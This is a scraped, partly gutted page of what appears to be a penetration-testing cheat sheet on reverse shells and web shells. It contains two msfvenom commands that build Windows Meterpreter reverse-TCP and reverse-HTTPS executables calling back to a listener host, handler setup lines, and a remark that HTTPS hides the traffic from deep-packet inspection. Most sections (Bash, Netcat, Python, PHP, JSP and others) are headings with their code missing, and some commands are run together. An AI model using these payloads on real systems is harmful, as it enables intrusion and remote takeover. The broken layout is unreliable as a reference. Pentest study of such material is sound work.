Shell
Reverse-shells
This is s great collection of different types of reverse shells and webshells. Many of the ones listed below comes from this cheat-sheet: https://highon.coffee/blog/reverse-shell-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Msfvenom
There is an important difference between non-staged and staged payload. A non-staged shell is sent over in one block. You just send shell in one stage. This can be caught with metasploit multi-handler. But also with netcat.
staged shells send them in turn. This can be useful for when you have very small buffer for your shellcode, so you need to divide up the payload. Meterpreter is a staged shell. First it sends some parts of it and sets up the connection, and then it sends some more. This can be caught with metasploit multi-handler but not with netcat.
Windows
Meterpreter
Standard meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.101 LPORT=445 -f exe -o shell_reverse.exeuse exploit/multi/handler
set payload windows/meterpreter/reverse_tcpMeterpreter HTTPS
It makes the meterpreter-traffic look normal. Since it is hidden in https the communication is encrypted and can be used to bypass deep-packet inspections.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.101 LPORT=443 -f exe -o met_https_reverse.exeNon-staged payload
Staged payload
This must be caught with metasploit. It does not work with netcat.
Inject payload into binary
Linux
Binary
Bash
Php
Netcat
Bind shell
Reverse shell
With -e flag
Without -e flag
Ncat
Ncat is a better and more modern version of netcat. One feature it has that netcat does not have is encryption. If you are on a pentestjob you might not want to communicate unencrypted.
Bind
Telnet
Perl
Ruby
Java
Python
Web-shells - Platform Independent
PHP
This php-shell is OS-independent. You can use it on both Linux and Windows.
ASP
WAR
JSP
Last updated